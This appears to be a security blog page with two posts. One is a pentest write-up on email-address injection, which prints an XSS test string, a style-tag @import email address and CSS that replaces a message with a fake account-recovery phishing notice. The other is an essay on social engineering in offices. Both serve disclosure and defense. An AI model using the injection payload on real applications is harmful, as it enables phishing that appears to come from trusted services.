Search
Twitter

Entries in Social Engineering (2)

Monday
Jun132016

Email Injection

On a recent project, we noticed that an application was accepting email addresses in an unsafe format. In the case of this application, it was sending the email address in an email to a user’s account, without escaping.

It’s not that the application wasn’t validating email addresses. It was, in fact, running all email address through the standard Java validator, javax.mail.internet.InternetAddress.validate().

However, legal email addresses can have some amazingly complex things in them.

The Wikipedia page for email addresses has examples of legitimate, if crazy, email addresses.

The Java library mostly (but not completely) agrees with the email addresses as indicated in that article.

Now, to put dangerous content into email addresses, there are two general methods useful for attackers: comments and quoted portions. The Java library does not accept comments in email addresses, but it does accept quoted portions.

This is an example of a legal email using quoting:

 "john.smith"@example.org

as is

 "john.smith<script>alert(1);<script>"@example.org

Web pen testers will recognize the latter as the canonical test for an XSS attack.

In this case, the email address was being put into an outbound email. This normally is not an XSS vector. Email is typically read in a dedicated mail application, or in a webapp. Mail applications often don’t have JavaScript engines, and Webmail applications as a rule will refuse to render any JavaScript. (Sometimes attackers will find a way around this, but it’s very hard to do, and if they succeed it is a much bigger problem than any I describe here.)

Modern mail readers still have significant CSS capabilities, so the ability to insert arbitrary HTML into them means the ability to change the message visible to the user arbitrarily.  This can lead to very successful phishing attacks, since an attacker can cause malicious messages to originate from the legitimate and expected service.

My primary mail reader target was OSX’s Mail.app, with Thunderbird as a secondary.

The application we were looking at had a strong limit of 50 characters for an email address, and the domain had to have at least two labels, of which the second had to be at least 2 characters. (This is not part of the RFC, nor does the Java library require it.) Given the quotes and the domain, the longest message that could be inserted was 43 characters:

    "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"@x.xx

It was necessary, of course, to start a style tag, as well as to close it, so that left us with this much room:

    "<style>XXXXXXXXXXXXXXXXXXXXXXXXXXXX</style>"@x.xx

This still allowed room for a payload to be inserted thanks to URL shorteners and use of the @import directive.

    "<style>@import 'http://xxxxxxxxxxx'</style>"@x.xx

The “http://” is required in the mail context, as are the quotes.

Can a normal person fit a URL in 11 characters?  Domains like “ant.nu” are available, but there is no need to splurge on a short domain.  The best link shorteners can give you a URL in 9 characters, so this is our hostile email addresses, with two characters to spare

    "<style>@import 'http://ly.my/pva'</style>"@x.xx

Now, with arbitrary space, we can put in an appropriate payload that overwrites the message:

body {
  visibility: hidden;
}
body:after {
  content:'We have detected unauthorized access to your account. Please visit http://example.account-recovery.net/ to restore access, or call 555-1212.';
  visibility: visible;
  display: block;
  position: absolute;
  padding: 5px;
  top: 2px;
}

And the message in Apple Mail.app looks like this:

In Thunderbird, if you accept the warning to load remote content, you get this:

LESSONS

  1. Email address validation is not the same as email address sanitization.
  2. More mail readers should be suspicious of external links, and offer an option like Thunderbird does to delay loading of external content.
Wednesday
Apr082009

Creating a Patch for Human Stupidity

Social engineers use old tricks and new to bypass firewalls and other conventional IT security defences by taking advantage of human weakness or kindness to attack secure buildings, machine rooms, or trading floors from inside. This gives them access to information and data that they simply couldn't get by hacking a web site. They don't have to pick locks or break windows as it’s usually easier not to. They use research, a plausible “story”, and a winning smile. A high-profile example of this type of attack was prosecuted in the UK in March 2009.

In September 2004, security procedures at The Sumitomo Mitsui Banking Corporation failed it when one of its security guards let friends in to play cards. The hackers installed software that recorded pictures of information on computer screens, details of keystrokes and of users' security details. They were caught when they tried to collect on the information they had harvested.

In 2007, a conman gained access to the safety deposit boxes at an ABN Amro bank in Antwerp's diamond quarter, in what is thought to have been the biggest robbery ever committed by one person. The thief used no violence, just his charm, to gain entry and steal gems worth €21 million.

"He bought chocolates for the personnel, he was a nice guy, he charmed them, got the original of keys to make copies and got information on where the diamonds were," said Philip Claes, spokesman for the Diamond High Council in Antwerp.

Many people who work in offices will know that passwords, key codes, and SecureID tokens can often be simply picked up off the desks around them. If a social engineer can gain access to an office, any of this information is potentially up for grabs. The data that can be accessed using these items is very likely to be critical to the company, otherwise why defend it?

So how do you defend your company against an attacker who uses his knowledge of your staff to simply walk into the building?

The patch for human weakness is simple: education. An informed workforce is safer than one left in the dark. Managers should try to create a corporate culture in which security is everybody’s business, not just that of the IT department or the security guard. An organisation’s technological security may identify some attacks, but if the staff and organisational culture are on your side as well, then your systems will be far more secure.

For example, employees should understand that if legitimate IT staff need access to a machine, they should not need the employee's help, or username and password, to do so. But if the company's employees treat technology as a feared and mysterious thing, it leaves a hole through which a social engineer can attack. The social engineer may be given access to critical systems, simply by posing as one of the IT staff. During social engineering engagements we have had instances where employees have logged in for the social engineering team, believing them to be IT staff, and left them in charge of critical systems.

Since we started testing how companies' systems hold up against social engineering attacks, we have been surprised by how easy it is to operate in a crowded room. We have even worked in restricted access areas and never been challenged. Looking like you belong and are busy can make people leave you alone. Why does this work?

Most organisations' security policies require that staff ask people who they do not recognise for company ID. But especially in Britain, asking for ID is seen as confrontational behaviour and those who do it may meet more outrage than praise for their understanding of the need to challenge strangers. You need more that just a policy to resolve this problem; you need to teach people that social engineering actually happens, and that they can make a difference.

In the UK we are lucky enough to have a TV show called the Real Hustle. This show purports to teach people about the way con men work and protect them from getting hustled. If it can work for keeping peoples money in their wallets, couldn’t staff education in a similar vain keep corporate data safe?